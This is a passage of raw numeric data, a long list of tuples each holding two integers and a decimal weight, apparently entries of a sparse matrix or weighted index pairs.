(288, 18, 0.28),
(46, 18, 0.34),
(168, 18, 0.42),
(246, 18, 0.42),
(264, 18, 0.42),
(272, 18, 0.42),
(280, 18, 0.42),
(193, 18, 0.56),
(239, 18, 0.56),
(262, 18, 0.56),
(265, 18, 0.56),
(266, 18, 0.56),
(240, 18, 0.7),
(254, 18, 0.7),
(290, 18, 0.7),
(306, 18, 0.7),
(174, 18, 0.84),
(178, 18, 0.84),
(244, 18, 0.84),
(242, 18, 1.12),
(252, 18, 1.12),
(31, 19, 0.95669),
(159, 19, 0.95669),
(160, 19, 0.95669),
(250, 19, 0.95669),
(251, 19, 0.95669),
(31, 20, 1.07331),
(159, 20, 1.07331),
(160, 20, 1.07331),
(250, 20, 1.07331),
(251, 20, 1.07331),
(31, 21, 0.95669),
(250, 21, 0.95669),
(251, 21, 0.95669),
(31, 22, 1.05),
(250, 22, 1.05),
(251, 22, 1.05),
(31, 23, 0.23331),
(159, 23, 0.23331),
(160, 23, 0.23331),
(239, 23, 0.23331),
(250, 23, 0.23331),
(251, 23, 0.23331),
(262, 23, 0.23331),
(264, 23, 0.23331),
(267, 23, 0.23331),
(288, 23, 0.46662),
(31, 24, 0.93331),
(159, 24, 0.93331),
(160, 24, 0.93331),
(250, 24, 0.93331),
(251, 24, 0.93331),
(31, 25, 1.00331),
(159, 25, 1.00331),
(160, 25, 1.00331),
(250, 25, 1.00331),
(251, 25, 1.00331),
(295, 26, 0.0175),
(298, 26, 0.105),
(159, 26, 0.14),
(160, 26, 0.14),
(305, 26, 0.175),
(301, 26, 0.21),
(304, 26, 0.21),
(44, 26, 0.28),
(287, 26, 0.28),
(31, 26, 0.42),
(250, 26, 0.42),
(251, 26, 0.42),
(299, 26, 0.595),
(308, 26, 0.7),
(161, 26, 0.98),
(233, 26, 0.98),
(264, 26, 0.98),
(249, 26, 1.18),
(237, 26, 1.26),
(246, 26, 1.26),
(247, 26, 1.26),
(252, 26, 1.26),
(255, 26, 1.26),
(257, 26, 1.26),
(261, 26, 1.26),
(294, 26, 1.28),
(168, 26, 1.4),
(235, 26, 1.54),
(244, 26, 1.54),
(256, 26, 1.68),
(270, 26, 1.68),
(273, 26, 1.68),
(238, 26, 1.82),
(241, 26, 1.82),
(254, 26, 1.82),
(245, 26, 1.84),
(269, 26, 1.96),
(292, 26, 1.96),
(263, 26, 2.1),
(265, 26, 2.1),
(266, 26, 2.1),
(268, 26, 2.1),
(267, 26, 2.24),
(290, 26, 2.24),
(243, 26, 2.38),
(253, 26, 2.52),
(248, 26, 2.54),
(236, 26, 2.66),
(288, 26, 2.66),
(258, 26, 2.94),
(272, 26, 2.94),
(280, 26, 2.94),
(259, 26, 3.22),
(260, 26, 3.22),
(274, 26, 3.52),
(275, 26, 3.52),
(174, 26, 3.78),
(262, 26, 3.92),
(193, 26, 4.48),
(239, 26, 4.68),
(306, 26, 5.04),
(242, 26, 5.1),
(240, 26, 5.8),
(178, 26, 6.16),
(31, 27, 0.86331),
(250, 27, 0.86331),
(251, 27, 0.86331),
(31, 28, 0.93331),
(250, 28, 0.93331),
(251, 28, 0.93331),
(31, 29, 0.88669),
(159, 29, 0.88669),
(160, 29, 0.88669),
(250, 29, 0.88669),
(251, 29, 0.88669),
(31, 30, 1.02669),
(159, 30, 1.02669),
(160, 30, 1.02669),
(250, 30, 1.02669),
(251, 30, 1.02669),
(31, 31, 1.02669),
(250, 31, 1.02669),
(251, 31, 1.02669),
(31, 32, 1.14331),
(250, 32, 1.14331),
(251, 32, 1.14331),
(31, 33, 0.32669),
(159, 33, 0.32669),
(160, 33, 0.32669),
(239, 33, 0.32669),
(240, 33, 0.32669),
(249, 33, 0.32669),
(250, 33, 0.32669),
(251, 33, 0.32669),
(265, 33, 0.32669),
(266, 33, 0.32669),
(269, 33, 0.32669),
(298, 33, 0.32669),
(299, 33, 0.32669),
(308, 33, 0.32669),
(238, 33, 0.65338),
(241, 33, 0.65338),
(242, 33, 0.65338),
(306, 33, 0.65338),
(31, 34, 1.12),
(160, 34, 1.12),
(250, 34, 1.12),
(251, 34, 1.12),
(31, 35, 1.28331),
(160, 35, 1.28331),
(250, 35, 1.28331),
(251, 35, 1.28331),
(295, 36, 0.035),
(298, 36, 0.0525),
(304, 36, 0.105),
(305, 36, 0.105),
(301, 36, 0.1225),
(161, 36, 0.14),
(233, 36, 0.14),
(245, 36, 0.14),
(248, 36, 0.14),
(249, 36, 0.14),
(299, 36, 0.1575),
(31, 36, 0.28),
(159, 36, 0.28),
(160, 36, 0.28),
(250, 36, 0.28),
(251, 36, 0.28),
(265, 36, 0.28),
(266, 36, 0.28),
(290, 36, 0.28),
(168, 36, 0.42),
(235, 36, 0.42),
(244, 36, 0.42),
(246, 36, 0.42),
(255, 36, 0.42),
(264, 36, 0.42),
(269, 36, 0.42),
(308, 36, 0.42),
(247, 36, 0.56),
(258, 36, 0.56),
(268, 36, 0.56),
(257, 36, 0.7),
(238, 36, 0.84),
(241, 36, 0.84),
(259, 36, 0.84),
(260, 36, 0.84),
(263, 36, 0.84),
(252, 36, 0.98),
(256, 36, 0.98),
(270, 36, 0.98),
(272, 36, 0.98),
(280, 36, 0.98),
(242, 36, 1.12),
(254, 36, 1.12),
(262, 36, 1.12),
(274, 36, 1.12),
(236, 36, 1.18),
(178, 36, 1.4),
(193, 36, 1.4),
(237, 36, 1.4),
(174, 36, 1.54),
(243, 36, 1.54),
(306, 36, 1.54),
(239, 36, 1.68),
(261, 36, 1.82),
(275, 36, 1.84),
(240, 36, 1.96),
(292, 36, 2.12),
(244, 37, 0.86331),
(31, 37, 1.72662),
(159, 37, 1.72662),
(160, 37, 1.72662),
(174, 37, 1.72662),
(250, 37, 1.72662),
(251, 37, 1.72662),
(272, 37, 1.72662),
(280, 37, 1.72662),
(193, 37, 2.58993),
(31, 38, 1.02669),
(159, 38, 1.02669),
(160, 38, 1.02669),
(250, 38, 1.02669),
(251, 38, 1.02669),
(31, 39, 0.98),
(159, 39, 0.98),
(160, 39, 0.98),
(250, 39, 0.98),
(251, 39, 0.98),
(272, 39, 1.96),
(280, 39, 1.96),
(31, 40, 0.28),
(159, 40, 0.28),
(160, 40, 0.28),
(237, 40, 0.28),
(250, 40, 0.28),
(251, 40, 0.28),
(254, 40, 0.28),
(255, 40, 0.28),
(257, 40, 0.28),
(292, 40, 0.28),
(240, 40, 0.56),
(267, 40, 0.56),
(268, 40, 0.56),
(298, 40, 0.56),
(308, 40, 0.56),
(31, 41, 1.00331),
(159, 41, 1.00331),
(160, 41, 1.00331),
(250, 41, 1.00331),
(251, 41, 1.00331),
(31, 42, 1.09669),
(159, 42, 1.09669),
(160, 42, 1.09669),
(250, 42, 1.09669),
(251, 42, 1.09669),
(31, 43, 0.37331),
(159, 43, 0.37331),
(160, 43, 0.37331),
(247, 43, 0.37331),
(250, 43, 0.37331),
(251, 43, 0.37331),
(298, 43, 0.37331),
(299, 43, 0.37331),
(308, 43, 0.37331),
(290, 43, 0.74662),
(31, 44, 1.05),
(159, 44, 1.05),
(160, 44, 1.05),
(250, 44, 1.05),
(251, 44, 1.05),
(31, 45, 1.16669),
(159, 45, 1.16669),
(160, 45, 1.16669),
(250, 45, 1.16669),
(251, 45, 1.16669),
(31, 46, 0.28),
(160, 46, 0.28),
(250, 46, 0.28),
(251, 46, 0.28),
(31, 47, 1.02669),
(160, 47, 1.02669),
(250, 47, 1.02669),
(251, 47, 1.02669),
(31, 48, 1.21331),
(160, 48, 1.21331),
(250, 48, 1.21331),
(251, 48, 1.21331),
(31, 429, 0.28),
(159, 429, 0.28),
(160, 429, 0.28),
(174, 429, 0.28),
(178, 429, 0.28),
(244, 429, 0.28),
(250, 429, 0.28),
(251, 429, 0.28),
(255, 429, 0.28),
(261, 429, 0.28),
(292, 429, 0.28),
(299, 429, 0.28),
(305, 429, 0.28),
(306, 429, 0.28),
(241, 429, 0.56),
(258, 429, 0.84),
(31, 430, 0.93331),
(159, 430, 0.93331),
(160, 430, 0.93331),
(250, 430, 0.93331),
(251, 430, 0.93331),
(31, 431, 1.07331),
(159, 431, 1.07331),
(160, 431, 1.07331),
(250, 431, 1.07331),
(251, 431, 1.07331),
(31, 432, 0.18669),
(159, 432, 0.18669),
(160, 432, 0.18669),
(250, 432, 0.18669),
(251, 432, 0.18669),
(253, 432, 0.18669),
(240, 432, 0.37338),
(299, 433, 0.04662),
(304, 433, 0.04662),
(305, 433, 0.06993),
(239, 433, 0.18669),
(242, 433, 0.18669),
(248, 433, 0.18669),
(264, 433, 0.18669),
(269, 433, 0.18669),
(306, 433, 0.18669),
(31, 433, 0.37338),
(159, 433, 0.37338),
(160, 433, 0.37338),
(241, 433, 0.37338),
(250, 433, 0.37338),
(251, 433, 0.37338),
(252, 433, 0.37338),
(261, 433, 0.37338),
(292, 433, 0.37338),
(255, 433, 0.56007),
(263, 433, 1.12014),
(31, 434, 1.86662),
(159, 434, 1.86662),
(160, 434, 1.86662),
(250, 434, 1.86662),
(251, 434, 1.86662),
(31, 435, 1.09669),
(159, 435, 1.09669),
(160, 435, 1.09669),
(250, 435, 1.09669),
(251, 435, 1.09669),
(31, 436, 1.05),
(159, 436, 1.05),
(160, 436, 1.05),
(250, 436, 1.05),
(251, 436, 1.05),
(31, 437, 0.42),
(159, 437, 0.42),
(160, 437, 0.42),
(193, 437, 0.42),
(236, 437, 0.42),
(238, 437, 0.42),
(240, 437, 0.42),
(241, 437, 0.42),
(250, 437, 0.42),
(251, 437, 0.42),
(255, 437, 0.42),
(292, 437, 0.42),
(298, 437, 0.42),
(308, 437, 0.42),
(237, 437, 0.84),
(261, 437, 0.84),
(269, 437, 0.84),
(306, 437, 1.26),
(305, 437, 2.52),
(31, 438, 1.07331),
(159, 438, 1.07331),
(160, 438, 1.07331),
(250, 438, 1.07331),
(251, 438, 1.07331),
(31, 439, 1.14331),
(159, 439, 1.14331),
(160, 439, 1.14331),
(250, 439, 1.14331),
(251, 439, 1.14331),
(31, 440, 0.32669),
(159, 440, 0.32669),
(160, 440, 0.32669),
(250, 440, 0.32669),
(251, 440, 0.32669),
(31, 441, 0.98),
(159, 441, 0.98),
(160, 441, 0.98),
(250, 441, 0.98),
(251, 441, 0.98),
(31, 442, 1.19),
(159, 442, 1.19),
(160, 442, 1.19),
(250, 442, 1.19),
(251, 442, 1.19),
(31, 443, 0.42),
(159, 443, 0.42),
(160, 443, 0.42),
(250, 443, 0.42),
(251, 443, 0.42),
(31, 444, 0.98),
(159, 444, 0.98),
(160, 444, 0.98),
(250, 444, 0.98),
(251, 444, 0.98),
(31, 445, 1.07331),
(159, 445, 1.07331),
(160, 445, 1.07331),
(250, 445, 1.07331),
(251, 445, 1.07331),
(31, 446, 0.32669),
(159, 446, 0.32669),
(160, 446, 0.32669),
(168, 446, 0.32669),
(174, 446, 0.32669),
(250, 446, 0.32669),
(251, 446, 0.32669),
(257, 446, 0.32669),
(258, 446, 0.32669),
(252, 446, 0.65338),
(31, 447, 0.46669),
(160, 447, 0.46669),
(242, 447, 0.46669),
(250, 447, 0.46669),
(251, 447, 0.46669),
(254, 447, 0.46669),
(261, 447, 0.93338),
(31, 448, 1.00331),
(160, 448, 1.00331),
(250, 448, 1.00331),
(251, 448, 1.00331),
(31, 449, 1.14331),
(160, 449, 1.14331),
(250, 449, 1.14331),
(251, 449, 1.14331),
(178, 450, 0.37331),
(31, 450, 0.74662),
(159, 450, 0.74662),
(160, 450, 0.74662),
(250, 450, 0.74662),
(251, 450, 0.74662),
(31, 451, 0.95669),
(159, 451, 0.95669),
(160, 451, 0.95669),
(250, 451, 0.95669),
(251, 451, 0.95669),
(31, 452, 1.02669),
(159, 452, 1.02669),
(160, 452, 1.02669),
(250, 452, 1.02669),
(251, 452, 1.02669),
(31, 453, 0.98),
(159, 453, 0.98),
(160, 453, 0.98),
(250, 453, 0.98),
(251, 453, 0.98),
(31, 454, 1.07331),
(159, 454, 1.07331),
(160, 454, 1.07331),
(250, 454, 1.07331),
(251, 454, 1.07331),
(159, 1029, 0.88669),
(160, 1029, 0.88669),
(159, 1030, 1.05),
(160, 1030, 1.05),
(159, 1031, 0.28),
(160, 1031, 0.28),
(240, 1031, 0.28),
(272, 1031, 0.28),
(280, 1031, 0.28),
(299, 1031, 0.56),
(290, 1031, 0.84),
(159, 1032, 0.91),
(160, 1032, 0.91),
(159, 1033, 1.05),
(160, 1033, 1.05),
(159, 1034, 0.23331),
(160, 1034, 0.23331),
(193, 1034, 0.23331),
(237, 1034, 0.23331),
(252, 1034, 0.23331),
(253, 1034, 0.23331),
(259, 1034, 0.23331),
(260, 1034, 0.23331),
(298, 1034, 0.23331),
(304, 1034, 0.23331),
(308, 1034, 0.23331),
(305, 1034, 0.46662),
(159, 1035, 1.02669),
(160, 1035, 1.02669),
(253, 1035, 1.02669),
(159, 1036, 1.09669),
(160, 1036, 1.09669),
(253, 1036, 1.09669),
(159, 1118, 0.32669),
(160, 1118, 0.32669),
(159, 1119, 1.00331),
(160, 1119, 1.00331),
(159, 1120, 1.14331),
(160, 1120, 1.14331),
(161, 1230, 0.91),
(242, 1230, 0.91),
(305, 1239, 0.01169),
(304, 1239, 0.02338),
(301, 1239, 0.03507),
(161, 1239, 0.09331),
(237, 1239, 0.09331),
(238, 1239, 0.09331),
(248, 1239, 0.09331),
(254, 1239, 0.09331),
(255, 1239, 0.09331),
(257, 1239, 0.09331),
(258, 1239, 0.09331),
(259, 1239, 0.09331),
(260, 1239, 0.09331),
(264, 1239, 0.09331),
(267, 1239, 0.09331),
(268, 1239, 0.09331),
(275, 1239, 0.09331),
(292, 1239, 0.09331),
(236, 1239, 0.18662),
(246, 1239, 0.18662),
(261, 1239, 0.18662),
(272, 1239, 0.18662),
(280, 1239, 0.18662),
(287, 1239, 0.18662),
(178, 1239, 0.27993),
(239, 1239, 0.27993),
(243, 1239, 0.27993),
(249, 1239, 0.27993),
(263, 1239, 0.27993),
(270, 1239, 0.27993),
(168, 1239, 0.37324),
(273, 1239, 0.37324),
(290, 1239, 0.46655),
(306, 1239, 0.46655),
(193, 1239, 0.55986),
(240, 1239, 0.55986),
(241, 1239, 0.55986),
(242, 1239, 0.74648),
(161, 1240, 0.79331),
(193, 1240, 0.79331),
(239, 1240, 0.79331),
(304, 1240, 0.79331),
(161, 1674, 0.23331),
(238, 1674, 0.23331),
(248, 1674, 0.23331),
(259, 1674, 0.23331),
(260, 1674, 0.23331),
(246, 1680, 0.28),
(161, 1680, 0.56),
(31, 2523, 1.12008),
(159, 2523, 1.12008),
(160, 2523, 1.12008),
(174, 2523, 1.12008),
(237, 2523, 1.12008),
(250, 2523, 1.12008),
(251, 2523, 1.12008),
(252, 2523, 1.12008),
(253, 2523, 1.12008),
(254, 2523, 1.12008),
(256, 2523, 1.12008),
(265, 2523, 1.12008),
(266, 2523, 1.12008),
(267, 2523, 1.12008),
(268, 2523, 1.12008),
(269, 2523, 1.12008),
(270, 2523, 1.12008),
(272, 2523, 1.12008),
(273, 2523, 1.12008),
(274, 2523, 1.12008),
(275, 2523, 1.12008),
(280, 2523, 1.12008),
(288, 2523, 1.12008),
(290, 2523, 1.12008),
(292, 2523, 1.12008),
(299, 2523, 1.12008),
(301, 2523, 1.12008),
(244, 2602, 0.04669),
(235, 2602, 0.2668),
(237, 2602, 0.2668),
(241, 2602, 0.2668),
(254, 2602, 0.2668),
(255, 2602, 0.2668),
(257, 2602, 0.2668),
(258, 2602, 0.2668),
(259, 2602, 0.2668),
(260, 2602, 0.2668),
(261, 2602, 0.2668),
(262, 2602, 0.2668),
(263, 2602, 0.2668),
(264, 2602, 0.2668),
(265, 2602, 0.2668),
(266, 2602, 0.2668),
(267, 2602, 0.2668),
(268, 2602, 0.2668),
(269, 2602, 0.2668),
(270, 2602, 0.2668),
(272, 2602, 0.2668),
(273, 2602, 0.2668),
(275, 2602, 0.2668),
(280, 2602, 0.2668),
(290, 2602, 0.2668),
(292, 2602, 0.2668),
(301, 2602, 0.2668),
(304, 2602, 0.2668),
(305, 2602, 0.2668),
(274, 2602, 0.31349),
(241, 2603, 4.9332),
(255, 2603, 4.9332),
(257, 2603, 4.9332),
(258, 2603, 4.9332),
(259, 2603, 4.9332),
(260, 2603, 4.9332),
(261, 2603, 4.9332),
(262, 2603, 4.9332),
(263, 2603, 4.9332),
(264, 2603, 4.9332),
(265, 2603, 4.9332),
(266, 2603, 4.9332),
(267, 2603, 4.9332),
(268, 2603, 4.9332),
(269, 2603, 4.9332),
(270, 2603, 4.9332),
(272, 2603, 4.9332),
(273, 2603, 4.9332),
(274, 2603, 4.9332),
(275, 2603, 4.9332),
(280, 2603, 4.9332),
(290, 2603, 4.9332),
(292, 2603, 4.9332),
(301, 2603, 4.9332),
(304, 2603, 4.9332),
(305, 2603, 4.9332),
(168, 10365, 0.18669),
(178, 10365, 0.18669),
(240, 10365, 0.18669),
(244, 10365, 0.18669),
(272, 10365, 0.18669),
(280, 10365, 0.18669),
(290, 10365, 0.18669),
(267, 10365, 0.56007),
(262, 10365, 1.49352),
(250, 10365, 1.52019),
(237, 10444, 0.28),
(264, 10444, 0.28),
(287, 10444, 0.28),
(288, 10444, 0.28),
(251, 10444, 1.68),
(178, 12610, 0.86331),
(242, 12610, 0.86331),
(252, 12610, 0.86331),
(263, 12610, 0.86331),
(178, 12611, 0.93331),
(242, 12611, 0.93331),
(252, 12611, 0.93331),
(263, 12611, 0.93331),
(240, 12615, 1.68),
(252, 12615, 1.68),
(299, 12621, 0.05838),
(168, 12621, 0.23331),
(174, 12621, 0.23331),
(193, 12621, 0.23331),
(236, 12621, 0.23331),
(240, 12621, 0.23331),
(243, 12621, 0.23331),
(244, 12621, 0.23331),
(247, 12621, 0.23331),
(249, 12621, 0.23331),
(252, 12621, 0.23331),
(254, 12621, 0.23331),
(255, 12621, 0.23331),
(261, 12621, 0.23331),
(265, 12621, 0.23331),
(266, 12621, 0.23331),
(267, 12621, 0.23331),
(238, 12621, 0.46662),
(239, 12621, 0.46662),
(242, 12621, 0.69993),
(306, 12621, 0.69993),
(268, 12621, 2.09979),
(305, 12624, 0.02919),
(178, 12624, 0.23331),
(233, 12624, 0.23331),
(244, 12624, 0.23331),
(245, 12624, 0.23331),
(247, 12624, 0.23331),
(249, 12624, 0.23331),
(263, 12624, 0.23331),
(269, 12624, 0.23331),
(252, 12624, 0.69993),
(233, 12627, 0.91),
(269, 12627, 0.91),
(305, 12627, 0.91),
(252, 12627, 1.82),
(178, 12637, 0.88669),
(254, 12637, 0.88669),
(272, 12637, 0.88669),
(280, 12637, 0.88669),
(252, 12637, 3.54676),
(252, 12639, 0.95669),
(272, 12639, 0.95669),
(280, 12639, 0.95669),
(193, 12642, 0.86331),
(236, 12642, 0.86331),
(238, 12642, 0.86331),
(241, 12642, 0.86331),
(242, 12642, 0.86331),
(247, 12642, 0.86331),
(256, 12642, 0.86331),
(258, 12642, 0.86331),
(261, 12642, 0.86331),
(168, 12642, 1.72662),
(239, 12642, 1.72662),
(244, 12642, 1.72662),
(252, 12642, 1.72662),
(264, 12642, 1.72662),
(305, 12642, 1.72662),
(239, 12647, 0.28),
(252, 12647, 0.28),
(174, 12650, 0.18669),
(236, 12650, 0.18669),
(238, 12650, 0.18669),
(239, 12650, 0.18669),
(241, 12650, 0.18669),
(243, 12650, 0.18669),
(244, 12650, 0.18669),
(252, 12650, 0.18669),
(258, 12650, 0.18669),
(268, 12650, 0.18669),
(272, 12650, 0.18669),
(274, 12650, 0.18669),
(280, 12650, 0.18669),
(292, 12650, 0.18669),
(295, 12650, 0.18669),
(193, 12650, 0.37338),
(254, 12650, 0.37338),
(256, 12650, 0.37338),
(263, 12650, 0.37338),
(273, 12650, 0.37338),
(305, 12650, 0.37338),
(240, 12650, 0.56007),
(242, 12650, 0.56007),
(178, 12650, 0.74676),
(240, 12653, 0.28),
(241, 12653, 0.28),
(243, 12653, 0.28),
(248, 12653, 0.28),
(252, 12653, 0.28),
(256, 12653, 0.28),
(259, 12653, 0.28),
(260, 12653, 0.28),
(265, 12653, 0.28),
(266, 12653, 0.28),
(268, 12653, 0.28),
(290, 12653, 0.28),
(238, 12653, 0.56),
(242, 12653, 0.56),
(262, 12653, 0.56),
(272, 12653, 0.56),
(274, 12653, 0.56),
(280, 12653, 0.56),
(305, 12653, 0.56),
(258, 12653, 0.84),
(275, 12653, 0.84),
(174, 12653, 1.12),
(193, 12653, 1.68),
(298, 12656, 0.01169),
(299, 12656, 0.01169),
(304, 12656, 0.01169),
(305, 12656, 0.04676),
(174, 12656, 0.09331),
(178, 12656, 0.09331),
(233, 12656, 0.09331),
(236, 12656, 0.09331),
(237, 12656, 0.09331),
(252, 12656, 0.09331),
(258, 12656, 0.09331),
(262, 12656, 0.09331),
(263, 12656, 0.09331),
(268, 12656, 0.09331),
(273, 12656, 0.09331),
(275, 12656, 0.09331),
(288, 12656, 0.09331),
(308, 12656, 0.09331),
(235, 12656, 0.18662),
(239, 12656, 0.18662),
(241, 12656, 0.18662),
(242, 12656, 0.18662),
(249, 12656, 0.18662),
(254, 12656, 0.18662),
(256, 12656, 0.18662),
(272, 12656, 0.18662),
(280, 12656, 0.18662),
(287, 12656, 0.18662),
(292, 12656, 0.18662),
(193, 12656, 0.27993),
(243, 12656, 0.37324),
(240, 12656, 0.46655),
(306, 12656, 0.55986),
(238, 12656, 1.13305),
(193, 12661, 0.88669),
(252, 12661, 0.88669),
(268, 12661, 0.88669),
(253, 12663, 0.88669),
(252, 12663, 1.77338),
(252, 12666, 0.91),
(253, 12666, 0.91),
(252, 12668, 0.91),
(255, 12668, 0.91),
(273, 12668, 0.91),
(174, 12670, 0.88669),
(178, 12670, 0.88669),
(246, 12670, 0.88669),
(261, 12670, 0.88669),
(306, 12670, 0.88669),
(252, 12670, 1.77338),
(258, 12670, 1.77338),
(246, 12671, 0.95669),
(252, 12671, 0.95669),
(258, 12671, 0.95669),
(238, 12677, 0.91),
(252, 12677, 0.91),
(290, 12677, 0.91),
(261, 12677, 1.82),
(252, 12679, 0.88669),
(262, 12679, 0.88669),
(239, 12681, 0.88669),
(261, 12681, 0.88669),
(263, 12681, 0.88669),
(304, 12681, 0.88669),
(305, 12681, 0.88669),
(306, 12681, 0.88669),
(252, 12681, 1.77338),
(239, 12682, 0.95669),
(252, 12682, 0.95669),
(261, 12682, 0.95669),
(263, 12682, 0.95669),
(304, 12682, 0.95669),
(305, 12682, 0.95669),
(252, 12689, 0.28),
(259, 12689, 0.28),
(260, 12689, 0.28),
(304, 12692, 0.02338),
(305, 12692, 0.04676),
(299, 12692, 0.07014),
(233, 12692, 0.09331),
(236, 12692, 0.09331),
(249, 12692, 0.09331),
(253, 12692, 0.09331),
(257, 12692, 0.09331),
(258, 12692, 0.09331),
(264, 12692, 0.09331),
(272, 12692, 0.09331),
(280, 12692, 0.09331),
(288, 12692, 0.09331),
(290, 12692, 0.09331),
(193, 12692, 0.18662),
(238, 12692, 0.18662),
(246, 12692, 0.18662),
(252, 12692, 0.18662),
(254, 12692, 0.18662),
(261, 12692, 0.18662),
(265, 12692, 0.18662),
(266, 12692, 0.18662),
(267, 12692, 0.18662),
(269, 12692, 0.18662),
(275, 12692, 0.18662),
(174, 12692, 0.27993),
(235, 12692, 0.27993),
(245, 12692, 0.27993),
(256, 12692, 0.27993),
(274, 12692, 0.27993),
(237, 12692, 0.37324),
(244, 12692, 0.37324),
(168, 12692, 0.46655),
(239, 12692, 0.46655),
(262, 12692, 0.46655),
(263, 12692, 0.55986),
(178, 12692, 0.74648),
(306, 12692, 0.74648),
(240, 12692, 0.83979),
(242, 12692, 2.05282),
(168, 12693, 0.79331),
(193, 12693, 0.79331),
(236, 12693, 0.79331),
(249, 12693, 0.79331),
(252, 12693, 0.79331),
(257, 12693, 0.79331),
(261, 12693, 0.79331),
(265, 12693, 0.79331),
(266, 12693, 0.79331),
(275, 12693, 0.79331),
(288, 12693, 0.79331),
(305, 12693, 0.79331),
(239, 12693, 1.58662),
(240, 12693, 1.58662),
(263, 12693, 1.58662),
(306, 12693, 2.37993),
(262, 12693, 3.17324),
(242, 12693, 9.51972),
(242, 12694, 0.93331),
(252, 12694, 0.93331),
(263, 12694, 0.93331),
(233, 12697, 0.28),
(252, 12697, 0.56),
(292, 12697, 0.56),
(252, 12700, 0.42),
(263, 12700, 0.42),
(252, 12701, 1.12),
(263, 12701, 1.12),
(238, 13162, 0.42),
(240, 13162, 0.42),
(252, 13162, 0.42),
(299, 13162, 0.42),
(306, 13162, 0.84),
(246, 13162, 2.52),
(244, 13162, 4.26),
(238, 13163, 0.98),
(252, 13163, 0.98),
(306, 13163, 0.98),
(233, 13165, 0.18669),
(238, 13165, 0.18669),
(252, 13165, 0.18669),
(263, 13165, 0.18669),
(275, 13165, 0.18669),
(305, 13165, 0.18669),
(306, 13165, 0.18669),
(239, 13168, 0.18669),
(241, 13168, 0.18669),
(242, 13168, 0.18669),
(253, 13168, 0.18669),
(254, 13168, 0.18669),
(255, 13168, 0.18669),
(256, 13168, 0.18669),
(257, 13168, 0.18669),
(263, 13168, 0.18669),
(275, 13168, 0.18669),
(288, 13168, 0.18669),
(292, 13168, 0.18669),
(236, 13168, 0.37338),
(290, 13168, 0.37338),
(299, 13168, 0.37338),
(305, 13168, 0.37338),
(240, 13168, 0.56007),
(252, 13168, 0.56007),
(258, 13168, 0.56007),
(262, 13168, 0.56007),
(244, 13174, 0.18669),
(252, 13174, 0.18669),
(264, 13174, 0.56007),
(193, 13174, 0.93345),
(237, 13177, 0.28),
(252, 13177, 0.28),
(306, 13177, 0.28),
(243, 13180, 0.23331),
(252, 13180, 0.23331),
(306, 13180, 0.23331),
(305, 13183, 0.01169),
(178, 13183, 0.09331),
(235, 13183, 0.09331),
(236, 13183, 0.09331),
(237, 13183, 0.09331),
(238, 13183, 0.09331),
(239, 13183, 0.09331),
(244, 13183, 0.09331),
(245, 13183, 0.09331),
(246, 13183, 0.09331),
(247, 13183, 0.09331),
(248, 13183, 0.09331),
(249, 13183, 0.09331),
(253, 13183, 0.09331),
(255, 13183, 0.09331),
(257, 13183, 0.09331),
(258, 13183, 0.09331),
(259, 13183, 0.09331),
(260, 13183, 0.09331),
(263, 13183, 0.09331),
(267, 13183, 0.09331),
(269, 13183, 0.09331),
(272, 13183, 0.09331),
(273, 13183, 0.09331),
(274, 13183, 0.09331),
(280, 13183, 0.09331),
(290, 13183, 0.09331),
(240, 13183, 0.18662),
(242, 13183, 0.18662),
(193, 13183, 0.27993),
(241, 13183, 0.27993),
(252, 13183, 0.27993),
(268, 13183, 0.37324),
(288, 13183, 0.37324),
(306, 13183, 0.37324),
(238, 13186, 0.86331),
(252, 13186, 0.86331),
(255, 13186, 0.86331),
(268, 13186, 0.86331),
(272, 13186, 0.86331),
(280, 13186, 0.86331),
(288, 13186, 0.86331),
(306, 13186, 0.86331),
(193, 13186, 1.72662),
(193, 13187, 0.95669),
(252, 13187, 0.95669),
(255, 13187, 0.95669),
(272, 13187, 0.95669),
(280, 13187, 0.95669),
(252, 13188, 0.84),
(263, 13188, 0.84),
(269, 13188, 0.84),
(306, 13188, 0.84),
(239, 13190, 0.86331),
(248, 13190, 0.86331),
(252, 13190, 0.86331),
(255, 13190, 0.86331),
(261, 13190, 0.86331),
(263, 13190, 0.86331),
(269, 13190, 0.86331),
(304, 13190, 0.86331),
(305, 13190, 0.86331),
(292, 13190, 1.72662),
(239, 13191, 0.95669),
(252, 13191, 0.95669),
(269, 13191, 0.95669),
(304, 13191, 0.95669),
(305, 13191, 0.95669),
(252, 13192, 0.95669),
(263, 13192, 0.95669),
(306, 13192, 0.95669),
(235, 13194, 0.18669),
(252, 13194, 0.18669),
(256, 13194, 0.18669),
(257, 13194, 0.18669),
(259, 13194, 0.18669),
(260, 13194, 0.18669),
(178, 13194, 0.37338),
(252, 13197, 0.28),
(193, 13197, 0.56),
(168, 13200, 0.28),
(178, 13200, 0.28),
(193, 13200, 0.28),
(236, 13200, 0.28),
(237, 13200, 0.28),
(247, 13200, 0.28),
(248, 13200, 0.28),
(252, 13200, 0.28),
(255, 13200, 0.28),
(256, 13200, 0.28),
(258, 13200, 0.28),
(259, 13200, 0.28),
(260, 13200, 0.28),
(264, 13200, 0.28),
(288, 13200, 0.28),
(306, 13200, 0.28),
(239, 13200, 0.56),
(240, 13200, 0.56),
(257, 13200, 0.56),
(261, 13200, 0.56),
(298, 13200, 1.12),
(308, 13200, 1.12),
(268, 13200, 1.96),
(267, 13200, 2.52),
(304, 13200, 3.92),
(305, 13200, 6.16),
(254, 13200, 7),
(262, 13200, 10.64),
(252, 13203, 0.32669),
(262, 13203, 0.32669),
(240, 13203, 0.98007),
(235, 13206, 0.23331),
(242, 13206, 0.23331),
(243, 13206, 0.23331),
(248, 13206, 0.23331),
(262, 13206, 0.23331),
(269, 13206, 0.23331),
(273, 13206, 0.23331),
(305, 13206, 0.23331),
(240, 13206, 0.46662),
(247, 13206, 0.46662),
(252, 13206, 0.69993),
(253, 13206, 0.69993),
(247, 13207, 0.91),
(252, 13207, 0.91),
(174, 13213, 0.23331),
(178, 13213, 0.23331),
(233, 13213, 0.23331),
(239, 13213, 0.23331),
(240, 13213, 0.23331),
(243, 13213, 0.23331),
(252, 13213, 0.23331),
(254, 13213, 0.23331),
(255, 13213, 0.23331),
(259, 13213, 0.23331),
(260, 13213, 0.23331),
(264, 13213, 0.23331),
(268, 13213, 0.23331),
(306, 13213, 0.23331),
(242, 13213, 0.46662),
(273, 13213, 0.46662),
(193, 13213, 1.96647),
(193, 13216, 0.37331),
(252, 13216, 0.37331),
(168, 13219, 0.18669),
(237, 13219, 0.18669),
(242, 13219, 0.18669),
(252, 13219, 0.18669),
(262, 13219, 0.18669),
(263, 13219, 0.18669),
(44, 13219, 0.37338),
